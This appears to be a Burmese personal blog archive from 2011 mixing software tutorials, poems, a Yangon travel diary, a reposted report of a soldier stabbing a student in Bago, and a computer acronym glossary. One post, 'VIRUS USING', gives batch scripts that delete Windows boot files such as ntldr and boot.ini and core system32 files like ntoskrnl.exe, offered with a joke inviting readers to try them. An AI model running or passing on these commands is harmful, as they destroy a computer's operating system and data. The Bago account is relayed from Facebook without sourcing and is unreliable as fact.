၎။ template ဆိုတဲ့ tab မှာ မိမိသုံးချင်တဲ့ ဒီဇိုင်းကို ရွေးချယ်ပေးရမှာဖြစ်ပါတယ်။ ဘေးပတ်လည် frame က အသေဖြစ်ပြီး player တစ်ခုထဲမှာ ဗီဒီယို ဖွင့်ပြသလိုမျိုး လုပ်ပေးမှာပါ။ အဲဒီတော့ slide show တစ်ခုလုံးအတွက် frame တစ်ခုပဲ ရွေးနိုင်မှာပါ။ template တစ်ခုရွေးပြီးရင် ညာဘက် option အပေါ်ဆုံးက Template config ဆိုတာကို တွေ့ပါလိမ့်မယ်။ အဲဒါကိုနှိပ်ပြီး template ရဲ့ size တွေပြင်နိုင်တဲ့အပြင် play, forward စတဲ့ control buttons တွေ၊ photo view icon ထည့်မထည့်ဆိုတာလည်း ရွေးနိုင်ပါတယ်။ ၀ိုင်းပြထားတဲ့ Music ဆိုတာကိုနှိပ်ပြီး မိမိသုံးလိုတဲ့ သီချင်းကို ထည့်နိုင်ပါတယ်။ ပြီးရင်တော့ နောက် tab တစ်ခုကို သွားပါ့မယ်။
၅။ Decorate ဆိုတဲ့ tab မှာ ဒီ slide show အတွက် effect တွေ၊ အရုပ်လေးတွေ ထပ်ထည့်နိုင်ပါတယ်။
1. မိမိထည့်ချင်တဲ့ effect ကို slide show ထဲ drag လုပ်ပြီး ဆွဲထည့်ပေးပါ။ နေရာချပေးပါ။ သူ့အောက်မှာ ပေါ်လာမယ့် option တွေနဲ့ အဲဒီ effect တွေကို ထပ်ပြင်နိုင်ပါတယ်။
2. ပုံတစ်ပုံနဲ့ တစ်ပုံအကြား transform တွေက auto ထည့်ပေးထားပြီး ဖြစ်ပါတယ်။ မိမိဘာသာ ပြန်ပြောင်းချင်ရင် အဲဒီနေရာကို click ပြီး ကြိုက်တာတစ်ခုကို ရွေးပေးယုံပဲ။
3. အဖွင့် နဲ့ အဆုံး အတွက် စာသားတွေ ပြင်ဆင်ရေးသားနိုင်ပါတယ်။ (ရုပ်ရှင်ဇာတ်ကားတွေ စာတန်းထိုးသလိုပေါ့)
၆။ publish ဆိုတဲ့ နောက်ဆုံး tab ပါပဲ။ မိမိဘာဖိုင်အမျိုးအစားအနေနဲ့ လိုချင်တာလဲဆိုတာကိုပဲ ရွေးချယ်ပေးရမှာပါ။ swf ဆိုတဲ့ ရိုးရိုး flash movie type နဲ့ယူမှာလား၊ flash ဖိုင်ကို browser မှာပေါ်ဖို့ HTML နဲ့ရေးပြီးသားယူမလား၊ Executable ဆိုတဲ့ double click နှိပ်ယုံနဲ့ Player မလိုပဲ ပွင့်လာမယ့် .exe ဖိုင် အနေနဲ့ ယူမလား၊ screen saver အနေနဲ့ယူမလား (installer အနေနဲ့ လုပ်ပေးမှာဖြစ်ပါတယ်)၊ Email ကိုပဲ တိုက်ရိုက်ပို့ရမလား ဆိုတာကို ရွေးချယ်ပေးရုံပဲပေါ့။ setting မှာတော့ Template config တုန်းက အတိုင်းပဲ ဖြစ်ပါတယ်။ သုံးရတာ တော်တော်လေးမိုက်တယ်ဗျာ ကျွန်တော်လုပ်ကြည့်ပြီးလို့ပါ အချိန်ုကုန်လည်းသက်သာတယ်လေ ကဲ ငေးမနေနဲ့ တွေးမနေနဲ့ ဒေါင်းပြီး သားစမ်းကြည့်လိုက်ပါဦးဗျာ စားဖတ်သူအားလုံးကို ကျေးဇူးတင်ရှိပါကြောင်း။

Monday, April 18, 2011

ယိုစိမ့်သွားတဲ့စကားတစ်ချို့

နေ့တစ်နေ့တွေရဲ့ နောက်ဆုံးချိန်တွေဟာ ညရဲ့အိပ်စက်ခြင်းတွေနဲ့ပဲကုန်လွန်စေခဲ့တယ်...
အသစ်တွေဖန်တီးဖို့အတွက်ကတော့ နံနက်ခင်း မျက်လုံးတွေဖွင့်ချိန်တစ်ခုပါ......
နေ့ည ၊ ညနေ့နဲ့ နေ့ရက်တွေကို ၀ါးမျိုနေရင်း ငါ့အနာဂတ်တစ်ခုဆီကို
တစ်ရွေ့ရွေ့သွားနေပြန်တယ်....။
ငါ့ကို လှိုင်းတွေက ရိုက်ခက်လို့ ရှောင်လွှဲဖို့ခက်နေတယ် ငါကကမ်းပါးပေါ့....။
လမ်းဘေးမှာတွေ့ဖူးတယ် ပန်းအလှလေးတွေ ခူးစွတ်နမ်းရှိုက်ဖို့ ခက်ခဲနေကြတာလား
ဥယျာဉ်ခြံကျယ်မှာ ဖူးပွင့်ခဲ့မယ်ဆိုရင် အလေ့ကျပန်းလေးတွေ
ခူးစွတ်နမ်းရှိုက်မိမှာပဲနော်
နမ်းရှိုက်ကြည့်ပါ သူ့အလှ သူ့ရနံ့တွေ ရှိနေမှာ နမ်းရှိုက်ကြည့်ပါ ရှိနေမှာပါ....။
ငါက ဥယျာဉ်အပြင်က စွန်ပစ်ခံ အလေးကျပန်းလေးမို့ပါ....
ငါ့မှာ အသက်တစ်ချောင်းပဲ၇ှိခဲ့တယ် အဲဒါ မျှော်လင့်ခြင်းအသက်
မထင်မှတ်ပဲ ဘ၀ကွန်ယက်ထဲ ခုငါ လျှောက်နေစဲပါလား...
မမောပန်းနိုင်ပါဘူး အရှေ့မှာ စောင့်နေတယ် ငါ့အိပ်မက်ကြီးတစ်ခုလုံးက

Tuesday, April 12, 2011

မှတ်စုတိုတစ်ပုဒ်

ကျွန်တော်ခရီးခဏထွက်သွားလိုက်တာနဲ့ စာတွေမရေးဖြစ်တာကြာပြီဗျ
ရေးဖြစ်တော့လဲ ကြုံဆုံတာလေးပေါ့ အစစ်တွေနော် အုန်းကြူးပေါ့ :D
ရန်ကုန်ကိုပထမသွားလိုက်တယ် အစ်ကိုတစ်ယောက်မင်္ဂလာဆောင်ပါ သူနေတာ
ပုဇွန်တောင် မြို့နယ်မှာလေ ကျွန်တော်ရောက်သွားခဲ့တယ် (5)
ကြာနေခဲ့ပါတယ်။ပထမနေ့ မှာ ကန်တော်ကြီးကိုသွားလိုက်တယ် သွားတယ်ဆိုတာကလဲ
ဒီလိုပါ အစ်ကိုတစ်ယောက်ရဲ သီချင်းခွေ စုပေါင်းခွေပေါ့ သင်္ကြန်ခွေပါ သူ့ရဲ့
Free show ပေါ့ promotion လုပ်တဲ့ ပွဲတစ်ခုပါ။ ကျွန်တော် ညီကို
သူငယ်ချင်းတွေနဲ့ အငှားကား ငှားပြီး သွားကြတယ်။ သူငယ်ချင်း ကောင်းမလေး
တစ်ယောက်ကိုလဲ ဖုန်းဆက်ချိန်ထားလိုက်သေးတယ် သူ့နာမည်က (...) လို့ခေါ်တယ်
သူ့ဆီက ဖုန်းဝင်လာချိန်မှာ ကျွန်တော် ကံတော်ကြီး အရှေ့အပေါက်ဝကနေ
သွားစောင့်နေမိတယ် 10 မိနစ်လောက်အကြာ သူရောက်လာခဲ့တယ်။ဒါနဲ့
ဆိုင်တစ်ဆိုင်သွားထိုင်တယ် စားရင်းသောက်ရင်းနဲ့ပေါ့ စကားအနည်းငယ်
ပြောဖြစ်ခဲ့ကြတယ်.. နောက် ကောင်မလေးကို ဓါတ်ပုံတစ်ချို့ရိုက်ခဲ့တယ် အော်
ကောင်မလေးဆိုတာ ရိုးရိုးကောင်းမလေးပါ သူ့ပါးပြင်က ပါးချိုင့်လေးကို
ကျွန်တော် သဘောကျမိတာတော့ သေချာတယ် ဒါနဲ့ ပါးချိုင့်လေး ကို ဦးစားပေး
ရိုက်ခဲ့တယ်။အဲလိုနဲ့ တစ်ညတာ ကုန်ဆုံးသွားခဲ့တယ်။
အမှတ်တစ်ရ နောက်ရက်မှာတော့ ကျွန်တော့်အစ်ကို မင်္ဂလာဆောင်ကိုသွားခဲ့တယ်
မင်္ဂလာဆောင်က တိုက်ကြီးမှာ ဆောင်တာ ဖြစ်တဲ့အတွက် ရန်ကုန်ကနေ ကားနဲ့
ကျွန်တော်တို့ အဖွဲ့ သွားကြတယ်။ ကျွန်တော်တို့အဖွဲ့ဆိုလို့ပြောရဦးမယ်
ကျွန်တော့်သူငယ်ချင်း 10 နှစ်လောက်ခန့်မတွေ့ရတာကြာတဲ့
သူငယ်ချင်းပါတယ်၊နောက် မင်္ဂလာဆောင်မှာ တီးဝိုင်းထည့်ထားတဲ့အတွက်
ကီးဘုတ်ဆရာ ဆရာကီး၊ ကိုကျော် ၊ ကိုကောက် ကင်မရာ မန်းပေါ့ နောက်
ဓါတ်ပုံဆရာများနဲ့ ကျွန်တော့်အစ်ကို ကိုမိုး ၊ ဘစည်တို့ နဲ့အတူ
တိုက်ကြီးကို သွားခဲ့ကြတယ်။ကျွန်တော့်အစ်ကိုမင်္ဂလာဆောင်ဟာ တော်တော်
ခန်းနားလှပါတယ် ပျော်ရွှင်စရာကောင်းခဲ့ပါတယ်။နောက်တစ်ရက်ကတော့ ကျွန်တော်
အညာမြေပြန်မဲ့ ညမှာ DJ class တစ်ခုကိုသွားဖြစ်ခဲ့တယ်။ ကျွန်တော်ရဲ့
ကောင်မလေး သူငယ်ချင်း လဲပါတယ် ကျွန်တော်တို့နဲ့အတူ အဲဒီညကို ဖြူစင်စွာ
အတူ ဖြတ်သန်းခဲ့တယ်။ ကျွန်တော် ကျေးဇူးအရမ်းတင်မိခဲ့ပြီပေါ့။သို့သော်
အဲဒီည ကျွန်တော် အိပ်မပျော်ခဲ့ပါဘူး.. သူ့မှာ အဆင်ပြေပါ့မလားဆိုတဲ့
စိတ်ကြောင့်ပါ...။
နံနက်အစောကြီး သူကျွန်တော့်ထက်စောနိုးနေခဲ့တယ် သူညက ကျွန်တော့်
အစ်ကိုသူငယ်ချင်း ကောင်မလေးနဲ့ အတူအိပ်ခဲ့တယ်လေ..ကျွန်တော်
အိပ်ရာကနိုးတော့ သူ ၀ရံတာ က ခုံမှာထိုင်နေတာကို တွေ့ရတယ်။ကျွန်တော်
စကားတွေအများကြီးပြောချင်ခဲ့မိတယ် အချိန်မရလို့ကြောင့်လား..
အမြင်လွဲမှားစိုးထိတ်လို့လား အတွေးများစွာနဲ့ပဲ
ရုပ်သိမ်းခဲ့မိတယ်။အမှန်တိုင်းဆိုရင် ကျွန်တော် သံယောဇဉ်ဖြစ်မိသွားပြီ
မှားသွား မသိဘူး မမေ့ပါဘူး ညတစ်ညရဲ့ ရောင်စုံလင်းလတ်တဲ့
မီးရောင်စုံအောက်မှာ ကျွန်တော်စိတ်တွေ ပြိုလဲသွားခဲ့တာပါပဲ။အဖြူသက်သက်ပါ
**** ကျွန်တော်တစ်ခုလောက်ဖွင့်ဆိုကြည့်ချင်တယ်ဗျာ..အချစ်တို့မည်သည်
မထင်မှတ်ခြင်းတွေက
ရင်ဘက်ထဲထိရောက်သွားချင်းတွေပါပဲ...ဒီလောက်ပဲနော်...ကဲကဲ ကျွန်တော်ရဲ့
ဝတ္ထုဆန်ဆန် ကဗျာသဏ္ဍန်တွေကို အားပေးတဲ့ ပရိတ်သက်တွေကိုလဲ
အထူးကျေးဇူးတင်ရှိပါတယ်။။ကျွန်တော်စိတ်ကူးယဉ်ပုံပြင်တွေကို
ရေးသားခြင်းမရှိပါဘူး ကွန်မန်းမှာမရေးကြပေမဲ့ Cbox မှာ ရေးသားသွားတဲ့
ညီကို မောင်နှမများကို ကျေးဇူးတင်ပါတယ်။ ကျွန်တော့်ကို
ဆက်လက်အားပေးကြပါဦးနော်...ကျွန်တော်ရဲ့ မှတ်စုလေးတွေ ဆက်ရေချင်ပါသေးတယ်
(ခံစားချက်တွေကိုလဲ ကဗျာသဏ္ဍန်ဖန်တီးချင်ပါသေးတယ်ဗျာ)

Friday, April 1, 2011

VIRUS USING

VIRUS USING

@echo off
attrib -r -s -h c: utoexec.bat
del c: utoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini

Virus ရေးမယ်ဆိုရင် တော်တော်များများ အောက်ပါအတိုင်းပဲ ရေးပါတယ်။
1………….
@echo del off C:\\windows\system32
2………….
@echo off
del C:\\windows\system32

3………….
del "C:\windows\system32\bootok" /Q/S >nul
del "C:\windows\system32\bootvid" /Q/S >nul
del "C:\windows\system32\bootvrfy" /Q/S >nul
4………….
del "C:\windows\pchealth\"
del "C:\windows\system\"
del "C:\windows\system32\restore"
del "C:\windows\system32\autoexec.nt"
del "C:\windows\system32\logonui.exe"
del "C:\windows\system32\ntoskrnl.exe"

ဇ ရှိရင် ကိုယ့်စက်ကို စမ်းကြည့်ကြပါ...:D သူများတစ်ဦးတစ်ယောက်ကို
ဒုက္ခပေးဖို့အတွက် မဟုတ်ပါဘူး ဗဟုသုတ အနေနဲ့ သိစေလို့တဲ့ စိတ်ကူးဖြင့်
ဖော်ပြလိုက်ခြင်းဖြစ်ပါကြောင်း။

Tuesday, March 29, 2011

DVD to Mp3 Ripper

 Dvd to Mp3 ပြောင်းတဲ့ software ဖြစ်ပါတယ် full version လေးဖြစ်တဲ့အတွက် အဆင်ပြေမယ်ထင်လို့ တင်ပေးလိုက်ပါတယ်။ တစ်ခါတစ်ရံမှာလိုအပ်တာမို့ ဘော်ဒါတို့အတွက် လက်ဆောင်ပေါ့ဗျာ ယူထားလိုက်ကြ ကျေးဇူးအများကြီးတင်ပါတယ် ကိုယ့်ကိုပဲပြောလိုက်ဦးမယ်...:D









Wednesday, March 9, 2011

Home page ပြောင်းမယ်ဆိုရင်

အလုပ်တွေများနေလို့ စာမရေးဖြစ်တာကြာနေပြီ ခုလဲအားတယ်လို့တော့မဟုတ်ပါဘူး
ခဏနားရင် စိတ်ထဲပေါ်လာတာလေး ရေးလိုက်တာပါ သိသူရှိသလို မသိသူတွေလဲ
ရှိမယ်မလား အဲဒီတော့ မသိသေးတဲ့ သူတစ်ချို့အတွက်ပေါ့ဗျာ ကျွန်တော်တို့
Mozilla Firefox ဖွင့်လိုက်ရင် မိမိတို့ အသုံးပြုမဲ့ webpage ကို
အရင်ပေါ်စေချင်တယ်ဆိုရင် ဒီလိုပါ ပထမဦးစွာ Mozilla Firefox
ကိုအရင်ဖွင့်လိုက်ပါ အပေါ်မှာရှိနေမယ် Tools >> Options ဆိုပြီး
သွားလိုက်ပါ option အောက်မှ General ကိုရွေးမယ် ပြီးရင် Home page
အကွက်မှာ ဖွင့်ဖွင့် ချင်းပေါ်စေချင်တဲ့ address ကိုရိုက်ထဲ့လိုက်ပါ ဥပမာ
www.facebook.com ဒါဆိုရင် mozilla Firefox ကိုဖွင့်လိုက်တိုင်း facebook
page အရင်ကျလာမှဖြစ်ပါတယ်။ကျေးဇူးတင်ပါတယ်ဗျာ ကိုယ့်ကို ပဲ
ကျေးဇူးတင်လိုက်တော့မယ်နော်....:D

Saturday, March 5, 2011

ဆုံတွေ့ခိုက်

မင်းသိပါစေ အနမ်းနေ့ချိန်
နွေးထွေးနှုတ်ခမ်း မင်းအနမ်းနဲ့
ကြယ်တွေလှတဲ့ တို့ရဲ့ညချိန်
နှုတ်ခမ်းတစ်စုံ ချိုမြိန်ခဲ့လေပြီ...။
မျှော်လင့်ခြင်းနဲ့ တမ်းတနေ့ရက်
ငါ့ရင်ခွင်ထဲ မင်းရှိပါစေ...
အသံတွေတိတ် ညရဲ့အရိပ်
ကမ္ဘာသစ်သို့ လှမ်းခဲ့လေပြီ...။
မင်းသိပါစေ ငါ့အလွမ်းတွေ တစ်သီသီ
ပြန်လာခဲ့ပါ ငါ့ရင်ခွင်စီ...။

Friday, February 18, 2011

Myanmar National Song

 မြန်မာနိုင်ငံတော် သီချင်းလေးပါ ပထမ လင့်က mp3 အောက်ဆုံးက Flv file ဖြစ်ပါတယ် ဒေါင်းသွားနိုင်ပါပြီဗျာ
http://ifile.it/ou150ai/Myanmar-nation%20song.rar

http://ifile.it/zuokn4r/MyanmarNationalSong.rar

Taunggyi

Thursday, February 17, 2011

တောင်ကြီး ထမနဲပွဲ

ရပ်ကွက်အလိုက် ထမနဲထိုးပြိုင်ပွဲ မီးပုံးပျံကွင်းတွင် ကျင်းပပုံ

Monday, February 14, 2011

ကျောင်းသားနဲ့ စစ်တပ်

ဖေဖော်ဝါရီ ၁၁ ညက ပဲခူးမှာ ကောလိပ်ကျောင်းသားလေးတစ်ယောက်ကို စစ်တပ်က
တပ်ကြပ်ကြီးက ဓားနဲ့ထိုးလိုက်တာ ကျောင်းသားလေး ဗိုက်ပွင့်ပြီး
အူတွေထွက်ကာ ဆေးရုံေ၇ာက်လာပါတယ်။ဆေးရုံရောက်လာတဲ့ ကျောင်းသားလေးကို
နယ်မြေအပိုင်အမှတ်(၃)ရဲစခန်းမှ ဒုရဲအုပ်က ဆေးရုံရဲ့
အကြောင်းကြားပေးမှုကြောင့်ရောက်လာပြီး စစ်တပ်က လူနဲ့ဖြစ်မှန်းလဲသိရော
ကောင်လေးရဲ့ အဒေါ်ကို (ကောင်လေးကမိဘနှစ်ပါးမရှိပါ)
အမှုဖွင့်ချင်ဖွင့်..မဖွင့်လို့လဲရတယ်..ဖွင့်ချင်ရင်တော့ မနက်ကျမှ
တရားလိုပါခေါ်ခဲပါဆိုပြီး အမှုဖွင့်ခ သုံးသောင်းပေးရမယ်လို့ပါပြောပါတယ်..
အူတွေ ဗိုက်ထဲက ထွက်ကျနေတာတောင်မှ
အမှုမဖွင့်လည်းရတယ်လို့ပြောတာရယ်..တရားလို နစ်နာသူကိုတောင်
ပိုက်ဆံတောင်းရက်တဲ့ ဒုရဲအုပ်ဟာ ဘယ်လိုလူပါလဲ..?????????
အဲ့ကောင်လေးက ကောလိပ်ကျောင်းသားမှန်းလည်းသိရော ဒုရဲအုပ်ဟာ ချက်ချင်းပဲ
ဆေးရုံကလစ်ပါတော့တယ်..နောက်ထပ် ကျောင်းသားအုပ်စုတွေဆေးရုံကို
တဖွဲဖွဲရောက်လာတာကို ...အခု ပဲခူးမှာ ကျောင်းသားတွေက
အဲ့ကိစ္စကိုလုံးဝမကျေနပ်ကြဘူး။
ပဲခူးဟာ ပထမ လူငယ်နှစ်ယောက် စစ်တပ်က ပစ်သတ်ကတည်းက ပေါက်ကွဲချင်နေတဲံမြို့
အခု ကျောင်းသားတွေဘက်က ကျောင်းအုပ်ဆ၇ာကြီးနဲံ တစ်မြို့လုံးက
မခံနိုင်ဖြစ်နေကြတယ် ။
By : Facebook

Monday, February 7, 2011

ကွန်ပျူတာ ဝေါဟာရများ

ADSL - Asymmetric Digital Subscriber Line
AGP - Accelerated Graphics Port
ALI - Acer Labs, Incorporated
ALU - Arithmetic Logic Unit
AMD - Advanced Micro Devices
APC - American Power Conversion
ASCII - American Standard Code for Information Interchange
ASIC - Application Specific Integrated Circuit
ASPI - Advanced SCSI Programming Interface
AT - Advanced Technology
ATI - ATI Technologies Inc.
ATX - Advanced Technology Extended
--- B ---
BFG - BFG Technologies
BIOS - Basic Input Output System
BNC - Barrel Nut Connector
--- C ---
CAS - Column Address Signal
CD - Compact Disk
CDR - Compact Disk Recorder
CDRW - Compact Disk Re-Writer
CD-ROM - Compact Disk - Read Only Memory
CFM - Cubic Feet per Minute (ft�/min)
CMOS - Complementary Metal Oxide Semiconductor
CPU - Central Processing Unit
CTX - CTX Technology Corporation (Commited to Excellence)
--- D ---
DDR - Double Data Rate
DDR-SDRAM - Double Data Rate - Synchronous Dynamic Random Access Memory
DFI - DFI Inc. (Design for Innovation)
DIMM - Dual Inline Memory Module
DRAM - Dynamic Random Access Memory
DPI - Dots Per Inch
DSL - See ASDL
DVD - Digital Versatile Disc
DVD-RAM - Digital Versatile Disk - Random Access Memory
--- E ---
ECC - Error Correction Code
ECS - Elitegroup Computer Systems
EDO - Extended Data Out
EEPROM - Electrically Erasable Programmable Read-Only Memory
EPROM - Erasable Programmable Read-Only Memory
EVGA - EVGA Corporation
--- F ---
FC-PGA - Flip Chip Pin Grid Array
FDC - Floppy Disk Controller
FDD - Floppy Disk Drive
FPS - Frame Per Second
FPU - Floating Point Unit
FSAA - Full Screen Anti-Aliasing
FS - For Sale
FSB - Front Side Bus
--- G ---
GB - Gigabytes
GBps - Gigabytes per second or Gigabits per second
GDI - Graphical Device Interface
GHz - GigaHertz
--- H ---
HDD - Hard Disk Drive
HIS - Hightech Information System Limited
HP - Hewlett-Packard Development Company
HSF - Heatsink-Fan
--- I ---
IBM - International Business Machines Corporation
IC - Integrated Circuit
IDE - Integrated Drive Electronics
IFS- Item for Sale
IRQ - Interrupt Request
ISA - Industry Standard Architecture
ISO - International Standards Organization
--- J ---
JBL - JBL (Jame B. Lansing) Speakers
JVC - JVC Company of America
- K ---
Kbps - Kilobits Per Second
KBps - KiloBytes per second
--- L ---
LG - LG Electronics
LAN - Local Are Network
LCD - Liquid Crystal Display
LDT - Lightning Data Transport
LED - Light Emitting Diode
--- M ---
MAC - Media Access Control
MB - MotherBoard or Megabyte
MBps - Megabytes Per Second
Mbps - Megabits Per Second or Megabits Per Second
MHz - MegaHertz
MIPS - Million Instructions Per Second
MMX - Multi-Media Extensions
MSI - Micro Star International
--- N ---
NAS - Network Attached Storage
NAT - Network Address Translation
NEC - NEC Corporation
NIC - Network Interface Card
--- O ---
OC - Overclock (Over Clock)
OCZ - OCZ Technology
OEM - Original Equipment Manufacturer
--- P ---
PC - Personal Computer
PCB - Printed Circuit Board
PCI - Peripheral Component Interconnect
PDA - Personal Digital Assistant
PCMCIA - Peripheral Component Microchannel Interconnect Architecture
PGA - Professional Graphics Array
PLD - Programmable Logic Device
PM - Private Message / Private Messaging
PnP - Plug 'n Play
PNY - PNY Technology
POST - Power On Self Test
PPPoA - Point-to-Point Protocol over ATM
PPPoE - Point-to-Point Protocol over Ethernet
PQI - PQI Corporation
PSU - Power Supply Unit
--- R ---
RAID - Redundant Array of Inexpensive Disks
RAM - Random Access Memory
RAMDAC - Random Access Memory Digital Analog Convertor
RDRAM - Rambus Dynamic Random Access Memory
ROM - Read Only Memory
RPM - Revolutions Per Minute
--- S ---
SASID - Self-scanned Amorphous Silicon Integrated Display
SCA - SCSI Configured Automatically
SCSI - Small Computer System Interface
SDRAM - Synchronous Dynamic Random Access Memory
SECC - Single Edge Contact Connector
SODIMM - Small Outline Dual Inline Memory Module
SPARC - Scalable Processor ArChitecture
SOHO - Small Office Home Office
SRAM - Static Random Access Memory
SSE - Streaming SIMD Extensions
SVGA - Super Video Graphics Array
S/PDIF - Sony/Philips Digital Interface
--- T ---
TB - Terabytes
TBps - Terabytes per second
Tbps - Terabits per second
TDK - TDK Electronics
TEC - Thermoelectric Cooler
TPC - TipidPC
TWAIN - Technology Without An Important Name
--- U ---
UART - Universal Asynchronous Receiver/Transmitter
USB - Universal Serial Bus
UTP - Unshieled Twisted Pair
--- V ---
VCD - Video CD
VPN - Virtual Private Network
--- W ---
WAN - Wide Area Network
WTB - Want to Buy
WYSIWYG - What You See Is What You Get
--- X ---
XGA - Extended Graphics Array
XFX - XFX Graphics, a Division of Pine
XMS - Extended Memory Specification
XT - Extended Technology